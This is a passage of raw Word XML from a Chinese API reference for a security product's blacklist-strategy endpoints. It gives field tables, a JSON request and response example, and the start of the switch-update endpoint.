              <w:t>访问者范围，1:业务组、标签，2:自定义主机，3：自定义ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E482B5A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E57B967" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56706FA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3277F4DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EF9C004" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0CF6299A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01B3E3A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D305959" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E09E92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E3045E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74931D6C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AA6B064" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcIpRanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C9D60D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="252595E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF39475" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问者ip范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D524AD0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ADCBF08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1199670F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4513530F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11665186" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42B1C6A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="790CCBD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF45BAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B6E1022" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="186DADD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65BBA504" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="391EB016" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69561767" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26CCBB56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="173BA1D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="314BD0E1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AB67F57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7640143A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1354FD4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E85E26A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="564FAD61" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44990F72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayDstIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EF25BBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B61489" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3EB26C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>目标IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5834D4B4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49BB3B67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displaySrcIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EE2BE1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BA3C390" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6492362A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>源IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F585A2A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD0E95C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="529564CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="484932BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B2C58D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FB9296D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B87C9FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535CA263" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23CE81B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4453037A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D7706BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IpRange</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="40CB199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A49D607" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA496D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3ACCAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4FB4D9DC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AA24CD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F69AAEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23CECDAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E15CEEC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6816A45C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>endIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47AC5CA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6B367B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65AFFD16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D2E87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"strategyName": "新建黑名单-20220606164812",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"ports": ["7788"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protos": ["TCP"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displayPort": "7788",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"switchStatus": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstTagIds": ["all"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstGroupIds": [9],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstRealmType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcRealmType": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcAgentIds": ["628f27265aa65cab", "628f272b5aa65cac"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": "629dbf65c56dd50d10c9a984"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623EBC58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC6ADD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C7389"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="027CDA5B"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058FAAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1095A9A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58990C61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15B1B0AA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD184DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E2E7C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E2B7CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D1E958E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CD337C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E0EEAB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D4E3A48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22F4361C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="695C214E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E769A6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="770F59C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DCC8BBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="7B19BB02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="修改黑名单策略开关"/>
      <w:bookmarkEnd w:id="229"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>修改黑名单策略开关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25282467" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100953D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/ms-srv/api/black-strategy/update-switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E14EF1"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411"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1605"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2C23040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E9E6178" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
